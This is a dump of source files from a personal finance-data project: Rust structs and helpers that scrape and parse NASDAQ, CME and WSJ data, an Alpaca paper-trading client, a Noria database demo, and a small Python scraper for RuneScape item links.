\"camelCase\")]\npub struct OptionChainList {\n pub headers: ::serde_json::Value,\n pub rows: Vec<OptionRow>,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct OptionRow {\n pub call: Option<OptionData2>,\n pub put: Option<OptionData2>,\n}\n\nimpl OptionRow {\n pub fn to_recs(&self) -> Vec<Vec<String>> {\n let mut recs: Vec<Vec<String>> = vec![];\n\n if let Some(c) = &self.call {\n let call: Vec<String> = OptionData2::to_rec(&c);\n recs.push(call);\n }\n if let Some(p) = &self.put{\n\n let put: Vec<String> = OptionData2::to_rec(&p);\n recs.push(put);\n }\n return recs;\n }\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct OptionData2 {\n pub symbol: String,\n pub last: String,\n pub change: String,\n pub bid: String,\n pub ask: String,\n pub volume: String,\n pub openinterest: String,\n pub strike: String,\n pub expiry_date: String,\n pub colour: bool,\n}\n\nimpl OptionData2 {\n pub fn to_rec(&self) -> Vec<String> {\n return vec![\n self.symbol.to_string(),\n self.last.to_string().replace(\"--\", \"\"),\n self.change.to_string().replace(\"--\", \"\"),\n self.bid.to_string().replace(\"--\", \"\"),\n self.ask.to_string().replace(\"--\", \"\"),\n self.volume.to_string().replace(\"--\", \"\"),\n self.openinterest.to_string().replace(\"--\", \"\"),\n self.strike.to_string(),\n self.expiry_date.to_string(),\n self.colour.to_string(),\n ];\n }\n}\n\npub const NDAQ_OPTION_HEADER: [&'static str; 10] = [\n \"symbol\",\n \"last\",\n \"change\",\n \"bid\",\n \"ask\",\n \"volume\",\n \"openinterest\",\n \"strike\",\n \"expiry_date\",\n \"colour\",\n];\n" }, { "alpha_fraction": 0.5487805008888245, "alphanum_fraction": 0.5589430928230286, "avg_line_length": 21.363636016845703, "blob_id": "3d47880a1131aaef36fcf27a5b9c51b28bd20894", "content_id": "c0161c1614e55a409eb70ca9c7adce36e94bf479", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 492, "license_type": "no_license", "max_line_length": 81, "num_lines": 22, "path": "/py/rs.py", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "import utils\n\nROOT = 'http://services.runescape.com/m=itemdb_oldschool/'\n\ndef item_links(link: str) -> list:\n \"\"\"\n\n \"\"\"\n p = utils.page(link)\n t = p.find('tbody')\n rows = t.find_all('tr')\n links = []\n # a_tags = map()\n for row in rows:\n link = row.find('a')\n links.append(link['href'])\n return links\n\nif __name__ == \"__main__\":\n links = item_links(\n 'http://services.runescape.com/m=itemdb_oldschool/top100?list=2&scale=3')\n print(links)\n" }, { "alpha_fraction": 0.5488448739051819, "alphanum_fraction": 0.5600659847259521, "avg_line_length": 25.578947067260742, "blob_id": "6f97c24299b997df6eccd9f2f8253945a2265615", "content_id": "856f876b6d4a729152bc763bb0ccab165db6003e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 3030, "license_type": "no_license", "max_line_length": 137, "num_lines": 114, "path": "/finox/src/roses.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "use chrono::Utc;\nuse std::{\n //error::Error,\n fs::File,\n io::{prelude::*, BufReader},\n path::Path,\n thread,\n time::Duration,\n};\n\npub const DELAY: std::time::Duration = Duration::from_millis(10);\npub const USER_AGENT: &str = \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36\";\n\n#[tokio::main]\npub async fn simple_get(url: String) -> Result<String, reqwest::Error> {\n let client = reqwest::Client::builder()\n .user_agent(USER_AGENT.to_string())\n .build()?;\n let res = client.get(&url).send().await?;\n thread::sleep(DELAY);\n let body = res.text().await?;\n // println!(\"{}: {:#?}\", url, body);\n println!(\"{}\", url);\n Ok(body)\n}\n\n// simple fns arent useful, get 'cant start runtime from within runtime'\n#[tokio::main]\npub async fn simple_json(url: String) -> Result<::serde_json::Value, reqwest::Error> {\n let client = reqwest::Client::builder()\n .user_agent(USER_AGENT.to_string())\n .build()?;\n\n client\n .get(&url)\n .send()\n .await?\n .json::<::serde_json::Value>() // CHANGE TYPE\n .await\n}\n\n// change to take in File?\npub fn write_csv(\n filepath: &Path,\n data: Vec<Vec<String>>,\n header: &[&str],\n) -> Result<(), csv::Error> {\n let mut wtr =\n csv::Writer::from_path(filepath).expect(format!(\"whtf csv {:?}\", filepath).as_ref());\n println!(\"writing {} rows to {:?}\", data.len(), filepath);\n wtr.write_record(header.clone())?;\n wtr.flush()?;\n let len = header.len();\n for row in data.iter() {\n assert_eq!(len, row.len()); // perf hit?\n wtr.write_record(row)?;\n }\n wtr.flush()?;\n Ok(())\n}\n\n// takes File and optional header\npub fn to_csv(\n file: File,\n data: Vec<Vec<String>>,\n header: Option<&[&str]>,\n) -> Result<(), csv::Error> {\n // decide beforehand whether to append or not\n\n let mut wtr = csv::Writer::from_writer(file);\n if let Some(h) = header {\n wtr.write_record(h)?;\n }\n\n for row in data.iter() {\n wtr.write_record(row)?;\n }\n\n wtr.flush()?;\n //println!(\"wrote {} rows to somewhere (TODO File->Path)\", data.len());\n Ok(())\n}\n\npub fn read_tickers(file_name: impl AsRef<Path>) -> Vec<String> {\n let f = File::open(file_name).expect(\"no such file\");\n let buf = BufReader::new(f);\n buf.lines()\n .map(|l| l.expect(\"Could not parse line\"))\n .collect()\n}\n\npub fn read_into<'a, T: ?Sized>(file_name: &str) -> Result<Vec<T>, csv::Error>\nwhere\n for<'de> T: serde::Deserialize<'de> + 'a,\n{\n let mut rdr = csv::Reader::from_path(file_name)?;\n let mut iter = rdr.deserialize();\n let mut recs = vec![];\n while let Some(res) = iter.next() {\n let rec: T = res?;\n recs.push(rec);\n }\n Ok(recs)\n}\n\npub fn simppath(s: String, sfx: String) -> String {\n //sfx enum x, f, us\n return format!(\n \"../data/{}_{}_{}.csv\",\n s.to_string(),\n sfx.to_string(),\n Utc::now().to_rfc3339(),\n );\n}\n" }, { "alpha_fraction": 0.6861631870269775, "alphanum_fraction": 0.6880560517311096, "avg_line_length": 29.537572860717773, "blob_id": "f55b3efac70941a33c279ac3584e5d3d5bc761fd", "content_id": "3ecd93ddadf188059ba1f717a69ba0622421da08", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 5283, "license_type": "no_license", "max_line_length": 95, "num_lines": 173, "path": "/finox/src/misc/graphics.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "extern crate serde;\nextern crate serde_derive;\nextern crate serde_json;\n\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Graphics {\n pub items: Vec<Graphic>,\n pub expanded: ::serde_json::Value,\n pub cached_module: ::serde_json::Value,\n pub name: String, // asserteq!(name, \"Graphics\")\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Graphic {\n pub attachments: Attachments,\n pub credits: Credits,\n pub headline: String,\n pub headlines: Headlines,\n pub id: String,\n pub metadata: Metadata,\n pub extra_media: ExtraMedia,\n pub minor_updated_at: String,\n pub published_at: String,\n pub quote: ::serde_json::Value,\n pub revision: String,\n pub slug: String,\n pub summary: String,\n pub content_tags: Vec<ContentTag>,\n pub tags: Tags,\n #[serde(rename = \"type\")]\n pub type_field: String,\n pub updated_at: String,\n pub url: String,\n pub primary_site: String,\n pub related_stories: ::serde_json::Value,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Attachments {\n pub image: ::serde_json::Value,\n pub video: Video,\n pub video_audio: VideoAudio,\n}\n\n//uhoh\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Img {\n pub base_url: String,\n pub description: String,\n pub orig_width: i64,\n pub title: String,\n}\n\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Credits {\n pub author: Vec<Author>,\n pub by: Vec<Author>,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Author {\n pub slug: String,\n pub full_name: String,\n pub image: ::serde_json::Value,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Headlines {\n pub web: String,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Metadata {\n pub apple_news_free: bool,\n pub disable_ads: bool,\n pub exclude_from_cliff: bool,\n pub exclude_from_paywall: bool,\n pub social: Social,\n pub google_standout: bool,\n pub original: Original,\n pub diff: ::serde_json::Value,\n pub magazine: Option<Magazine>,\n pub theme: ::serde_json::Value,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Social {\n pub headline: String,\n pub description: String,\n pub facebook_status: String,\n pub twitter_text: String,\n pub twitter_title: String,\n pub twitter_description: String,\n pub twitter_handle: Option<String>,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Original {\n pub content_tags: Vec<ContentTag>,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct ContentTag {\n pub id: String,\n #[serde(rename = \"type\")]\n pub type_field: String,\n pub direct_score: Option<f64>,\n pub derived_score: f64,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Magazine {\n pub display_strap: ::serde_json::Value,\n pub headline_short: String,\n pub section: String,\n pub page_number: i64,\n pub short_deck: ::serde_json::Value,\n pub postscript: ::serde_json::Value,\n pub document_version: ::serde_json::Value,\n pub platform_version: String,\n #[serde(rename = \"type\")]\n pub type_field: String,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct ExtraMedia {\n pub thumbnail: ::serde_json::Value,\n pub social: Social2,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Social2 {\n pub default: ::serde_json::Value,\n pub twitter: Option<Twitter>,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Twitter {\n pub id: String,\n #[serde(rename = \"type\")]\n pub type_field: String,\n #[serde(rename = \"_links\")]\n pub links: ::serde_json::Value,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Tags {\n pub editorial_topics: Vec<EditorialTopic>,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct EditorialTopic {\n pub id: String,\n}\n" }, { "alpha_fraction": 0.6216880679130554, "alphanum_fraction": 0.6233269572257996, "avg_line_length": 28.76422691345215, "blob_id": "492d1b45a8b391ab9a2eb46bf16027b3d5a98933", "content_id": "387817832032805f80aa83f5f02018d5d3b323f5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 7322, "license_type": "no_license", "max_line_length": 95, "num_lines": 246, "path": "/apca/src/main.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "extern crate reqwest;\nmod keys;\nuse reqwest::header::{HeaderMap, HeaderName, HeaderValue};\n\n//use std::collections::HashMap;\n\npub fn get_headermap() -> HeaderMap {\n let mut headers = HeaderMap::new();\n let key_id = HeaderName::from_lowercase(b\"apca-api-key-id\").unwrap();\n let sec_key = HeaderName::from_lowercase(b\"apca-api-secret-key\").unwrap();\n headers.insert(\n key_id,\n HeaderValue::from_str(keys::APCA_API_KEY_ID).unwrap(),\n );\n headers.insert(\n sec_key,\n HeaderValue::from_str(keys::APCA_API_SECRET_KEY).unwrap(),\n );\n\n headers\n}\n\n#[tokio::main]\nasync fn main() -> Result<(), reqwest::Error> {\n let req_ep = \"account\";\n let post_ep = \"orders\";\n let pos_ep = \"positions\";\n let request_url = format!(\"https://paper-api.alpaca.markets/v2/{}\", req_ep);\n let post_url = format!(\"https://paper-api.alpaca.markets/v2/{}\", post_ep);\n let positions_url = format!(\"https://paper-api.alpaca.markets/v2/{}\", pos_ep);\n\n let headers = get_headermap();\n let client = reqwest::Client::builder()\n .default_headers(headers)\n .build()?;\n\n let res = client\n .get(&request_url)\n .send()\n .await?\n //.json::<Vec<ApcaAsset>>()\n .json::<ApcaAccount>()\n .await?;\n\n println!(\"{:#?}\", res);\n\n let order = ApcaPostOrder {\n symbol: \"AAPL\".to_string(),\n qty: 1,\n side: \"buy\".to_string(),\n type_field: \"market\".to_string(),\n time_in_force: \"day\".to_string(),\n //limit_price: None,\n //stop_price: None,\n //extended_hours: None,\n };\n\n println!(\"order struct{:#?}\", order);\n\n let order_res = client\n .post(&post_url)\n .json(&order)\n .send()\n .await?\n .json::<ApcaOrderTmp>()\n .await?;\n\n println!(\"{:#?}\", order_res);\n let positions = client\n .get(&positions_url)\n .send()\n .await?\n .json::<Vec<ApcaPosition>>()\n .await?;\n\n println!(\"{:#?}\", positions);\n\n Ok(())\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\npub struct FixRoot {\n pub side: String,\n pub symbol: String,\n #[serde(rename = \"type\")]\n pub type_field: String,\n pub qty: String,\n pub time_in_force: String,\n pub order_class: String,\n pub take_profit: TakeProfit,\n pub stop_loss: StopLoss,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\npub struct TakeProfit {\n pub limit_price: String,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\npub struct StopLoss {\n pub stop_price: String,\n pub limit_price: String,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\npub struct ApcaPostOrder {\n pub symbol: String,\n pub qty: u64,\n pub side: String, // buy, sell\n #[serde(rename = \"type\")]\n pub type_field: String, // market, limit, stop, stop_limit\n pub time_in_force: String, // day, gtc, opg, cls, ioc, fok\n //pub limit_price: Option<f64>, // if type == limit or stop_limit\n //pub stop_price: Option<f64>, //if type == stop or stop_limit\n //pub extended_hours: Option<bool>,\n // todo take_profit and stop_loss arms\n // pub order_class = Stiring, // simple, bracket, oco, oto\n //pub : bool,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\npub struct ApcaAsset {\n pub id: String,\n pub class: String,\n pub exchange: String,\n pub symbol: String,\n pub status: String,\n pub tradable: bool,\n pub marginable: bool,\n pub shortable: bool,\n pub easy_to_borrow: bool,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\npub struct ApcaAccount {\n pub account_blocked: bool,\n pub account_number: String,\n pub buying_power: String,\n pub cash: String,\n pub created_at: String,\n pub currency: String,\n pub daytrade_count: i64,\n pub daytrading_buying_power: String,\n pub equity: String,\n pub id: String,\n pub initial_margin: String,\n pub last_equity: String,\n pub last_maintenance_margin: String,\n pub long_market_value: String,\n pub maintenance_margin: String,\n pub multiplier: String,\n pub pattern_day_trader: bool,\n pub portfolio_value: String,\n pub regt_buying_power: String,\n pub short_market_value: String,\n pub shorting_enabled: bool,\n pub sma: String,\n pub status: String,\n pub trade_suspended_by_user: bool,\n pub trading_blocked: bool,\n pub transfers_blocked: bool,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\npub struct ApcaOrder {\n pub id: String,\n pub client_order_id: String,\n pub created_at: String,\n pub updated_at: String,\n pub submitted_at: String,\n pub filled_at: String,\n pub expired_at: String,\n pub canceled_at: String,\n pub failed_at: String,\n pub replaced_at: String,\n pub replaced_by: String,\n pub replaces: ::serde_json::Value,\n pub asset_id: String,\n pub symbol: String,\n pub asset_class: String,\n pub qty: String,\n pub filled_qty: String,\n #[serde(rename = \"type\")]\n pub type_field: String,\n pub side: String,\n pub time_in_force: String,\n pub limit_price: String,\n pub stop_price: String,\n pub filled_avg_price: String,\n pub status: String,\n pub extended_hours: bool,\n pub legs: ::serde_json::Value,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\npub struct ApcaOrderTmp {\n pub id: String,\n pub client_order_id: String,\n pub created_at: String,\n pub updated_at: String,\n pub submitted_at: String,\n pub filled_at: ::serde_json::Value,\n pub expired_at: ::serde_json::Value,\n pub canceled_at: ::serde_json::Value,\n pub failed_at: ::serde_json::Value,\n pub replaced_at: ::serde_json::Value,\n pub replaced_by: ::serde_json::Value,\n pub replaces: ::serde_json::Value,\n pub asset_id: String,\n pub symbol: String,\n pub asset_class: String,\n pub qty: String,\n pub filled_qty: String,\n pub filled_avg_price: ::serde_json::Value,\n pub order_class: String,\n pub order_type: String,\n #[serde(rename = \"type\")]\n pub type_field: String,\n pub side: String,\n pub time_in_force: String,\n pub limit_price: ::serde_json::Value,\n pub stop_price: ::serde_json::Value,\n pub status: String,\n pub extended_hours: bool,\n pub legs: ::serde_json::Value,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\npub struct ApcaPosition {\n pub asset_id: String,\n pub symbol: String,\n pub exchange: String,\n pub asset_class: String,\n pub avg_entry_price: String,\n pub qty: String,\n pub side: String,\n pub market_value: String,\n pub cost_basis: String,\n pub unrealized_pl: String,\n pub unrealized_plpc: String,\n pub unrealized_intraday_pl: String,\n pub unrealized_intraday_plpc: String,\n pub current_price: String,\n pub lastday_price: String,\n pub change_today: String,\n}\n" }, { "alpha_fraction": 0.5346359014511108, "alphanum_fraction": 0.547069251537323, "avg_line_length": 29.02666664123535, "blob_id": "680b98410ead0063053b9855e35fdabf8eeea847", "content_id": "b553485364bc2f3e82c88abe81819607527cd498", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 2252, "license_type": "no_license", "max_line_length": 97, "num_lines": 75, "path": "/db/src/main.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "use finox::nasdaq::realtime::RealtimeRoot;\nuse noria::prelude::*;\nuse std::{error::Error, time::Duration};\n\n#[tokio::main]\nasync fn main() -> Result<(), Box<dyn Error>> {\n let mut db = ControllerHandle::from_zk(\"127.0.0.1:2181/isit8\")\n .await\n .unwrap();\n\n db.install_recipe(\n \"\n CREATE TABLE Rt(sid varchar(16), t varchar(32), x float, v int, PRIMARY KEY(sid));\n CREATE TABLE Quote(sid varchar(16), qid varchar(32));\",\n )\n .await\n .unwrap();\n\n let mut quotes = db.table(\"Rt\").await.unwrap();\n let mut count = db.table(\"Quote\").await.unwrap();\n println!(\"{:#?} \", quotes.schema());\n println!(\"{:#?} \", count.schema());\n\n let (tickers, _) = finox::gen_secs(\"stocks\");\n let urls = tickers[1..5]\n .iter()\n .map(|x| x.to_nasdaq_rt_url())\n .collect::<Vec<_>>()\n .into_iter()\n .flatten()\n .collect();\n\n let recs = finox::fetch::<RealtimeRoot>(urls)\n .await\n .into_iter()\n .flatten()\n .collect::<Vec<Vec<String>>>();\n let mut noria_recs = vec![];\n\n for rec in recs.iter() {\n let noria_rec: Vec<noria::DataType> = rec.iter().map(|x| x.to_string().into()).collect();\n println!(\"{:#?} \", noria_rec);\n noria_recs.push(noria_rec);\n }\n quotes.perform_all(noria_recs).await.unwrap();\n //count\n // .insert(vec![r[0].clone().into(), format!(\"{}{}\", i, j).into()])\n // .await\n // .unwrap();\n\n println!(\"Finished writing! Let's wait for things to propagate...\");\n tokio::time::delay_for(Duration::from_millis(2000)).await;\n\n db.extend_recipe(\n \"\n QuoteCount: \\\n SELECT Quote.sid, COUNT(qid) as counts \\\n FROM Quote GROUP BY Quote.sid;\n QUERY Quotes: \\\n SELECT Rt.sid, t, x, v, QuoteCount.counts AS counts \\\n FROM Rt LEFT JOIN QuoteCount ON (Rt.sid = QuoteCount.sid) \\\n WHERE Rt.sid = ?;\n \",\n )\n .await\n .unwrap();\n let mut awvc = db.view(\"Quotes\").await.unwrap();\n //imdumb\n let ticks2 = finox::roses::read_tickers(\"../ref_data/tickers_stocks.txt\");\n //for tic in ticks2.iter() {\n let article = awvc.lookup(&[\"aa\".into()], true).await.unwrap();\n println!(\"{:#?} \", article);\n //}\n Ok(())\n}\n" }, { "alpha_fraction": 0.6088401675224304, "alphanum_fraction": 0.6128281950950623, "avg_line_length": 29.393939971923828, "blob_id": "34d5d1a499762acf5065e6f88b5223246dd67748", "content_id": "b66f90feadf572b0e657cd671c53bf9f1806d51a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 3009, "license_type": "no_license", "max_line_length": 95, "num_lines": 99, "path": "/finox/src/cme.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct CMERoot {\n pub quote_delayed: bool,\n pub quote_delay: String,\n pub trade_date: String,\n pub quotes: Vec<Quote>,\n pub empty: bool,\n}\n\nimpl crate::HasRecs for CMERoot {\n fn to_recs(&self) -> Vec<Vec<String>> {\n self.quotes.iter().map(|x| x.to_rec()).collect()\n }\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Quote {\n pub last: String,\n pub change: String,\n pub prior_settle: String,\n pub open: String,\n pub close: String,\n pub high: String,\n pub low: String,\n pub high_limit: String,\n pub low_limit: String,\n pub volume: String,\n pub md_key: String,\n pub quote_code: String,\n pub escaped_quote_code: String,\n pub code: String,\n pub updated: String,\n pub percentage_change: String,\n pub expiration_month: String,\n pub expiration_code: String,\n pub expiration_date: String,\n pub product_name: String,\n pub product_code: String,\n pub uri: String,\n pub product_id: i64,\n pub exchange_code: String,\n pub option_uri: String,\n pub has_option: bool,\n pub last_trade_date: LastTradeDate,\n pub price_chart: PriceChart,\n pub net_change_status: String,\n pub high_low_limits: String,\n}\n\nimpl Quote {\n pub fn to_rec(&self) -> Vec<String> {\n return vec![\n self.last_trade_date.timestamp.to_string(),\n self.last.to_string(),\n self.change.to_string(),\n self.prior_settle.to_string(),\n self.open.to_string(),\n self.close.to_string(),\n self.high.to_string(),\n self.low.to_string(),\n self.high_limit.to_string(),\n self.low_limit.to_string(),\n self.volume.to_string(),\n self.md_key.to_string(),\n self.quote_code.to_string(),\n self.expiration_month.to_string(),\n self.expiration_date.to_string(),\n self.product_name.to_string(),\n self.product_code.to_string(),\n self.uri.to_string(),\n self.product_id.to_string(),\n self.exchange_code.to_string(),\n self.option_uri.to_string(),\n self.has_option.to_string(),\n ];\n }\n}\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct LastTradeDate {\n pub timestamp: i64,\n pub date_only_long_format: String,\n pub default24: String,\n pub default12: String,\n pub verbose: String,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct PriceChart {\n pub enabled: bool,\n pub code: String,\n pub month_year: String,\n pub venue: i64,\n pub title: String,\n pub year: i64,\n}\n" }, { "alpha_fraction": 0.6051948070526123, "alphanum_fraction": 0.6064935326576233, "avg_line_length": 31.76595687866211, "blob_id": "5bc03249f1327a4258d72f113af3cd724cfc8ff7", "content_id": "67d4702de4d31aac72bf26135c6bd99f2c984e66", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 1540, "license_type": "no_license", "max_line_length": 95, "num_lines": 47, "path": "/finox/src/news/wsj.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "// https://video-api.wsj.com/api-video/find_all_videos.asp\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct WSJRoot {\n pub items: Vec<WSJVideos>,\n}\n\nimpl crate::HasRecs for WSJRoot {\n fn to_recs(&self) -> Vec<Vec<String>> {\n self.items.iter().map(|x| x.to_rec()).collect()\n }\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct WSJVideos {\n pub id: String,\n pub unix_creation_date: i64,\n pub name: String,\n pub description: String,\n pub duration: String,\n #[serde(rename = \"thumbnailURL\")]\n pub thumbnail_url: Option<String>,\n #[serde(rename = \"videoURL\")]\n pub video_url: Option<String>,\n #[serde(rename = \"emailURL\")]\n pub email_url: Option<String>,\n #[serde(rename = \"doctypeID\")]\n pub doctype_id: Option<String>,\n pub column: Option<String>,\n}\n\nimpl WSJVideos {\n pub fn to_rec(&self) -> Vec<String> {\n return vec![\n self.id.to_string(),\n self.unix_creation_date.to_string(),\n self.name.to_string(),\n self.description.to_string(),\n self.duration.to_string(),\n self.column.clone().unwrap_or(\"\".to_string()),\n self.doctype_id.clone().unwrap_or(\"\".to_string()),\n self.email_url.clone().unwrap_or(\"\".to_string()),\n self.thumbnail_url.clone().unwrap_or(\"\".to_string()),\n ];\n }\n}\n" }, { "alpha_fraction": 0.6919999718666077, "alphanum_fraction": 0.6940000057220459, "avg_line_length": 30.25, "blob_id": "f40d7cfda5bf5c9d653087e0a85fe604fde578cb", "content_id": "f645252e1fa96921ff0cf0024433a0a96640797b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 1000, "license_type": "no_license", "max_line_length": 98, "num_lines": 32, "path": "/finox/src/nasdaq/gen.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Status {\n pub r_code: i64,\n pub b_code_message: ::serde_json::Value,\n pub developer_message: ::serde_json::Value,\n}\n\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct LabelValue {\n pub label: String,\n pub value: String,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct DateVal {\n pub date_time: String,\n pub value: String,\n}\n\n// #[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\npub trait HasRecs {\n fn to_recs(&self) -> Vec<Vec<String>>;\n}\n\n// #[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\npub trait HasRec {\n fn to_rec(&self) -> Vec<String>;\n}\n" }, { "alpha_fraction": 0.6746716499328613, "alphanum_fraction": 0.6840525269508362, "avg_line_length": 28.61111068725586, "blob_id": "14ea91746844c93d11066ca3b47baafb6f2fd0dc", "content_id": "63777e94fc12b4d468478355c2c0e1e48eda79b1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 2665, "license_type": "no_license", "max_line_length": 95, "num_lines": 90, "path": "/finox/src/misc/sectors.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Root {\n pub id: String,\n pub sector_tree: SectorTree,\n pub content: Content,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct SectorTree {\n pub security: String,\n pub id: String,\n pub name: String,\n pub ni_codes: Vec<String>,\n pub children: Vec<Children>,\n pub percent_change1_day: f64,\n pub weight: i64,\n pub last_update_epoch: String,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Children {\n pub security: String,\n pub id: i64,\n pub name: String,\n pub ni_codes: Vec<String>,\n pub children: Vec<Children2>,\n pub percent_change1_day: f64,\n pub weight: f64,\n pub last_update_epoch: String,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Children2 {\n pub security: String,\n pub id: i64,\n pub name: String,\n pub ni_codes: Vec<String>,\n pub percent_change1_day: f64,\n pub weight: f64,\n pub last_update_epoch: String,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, 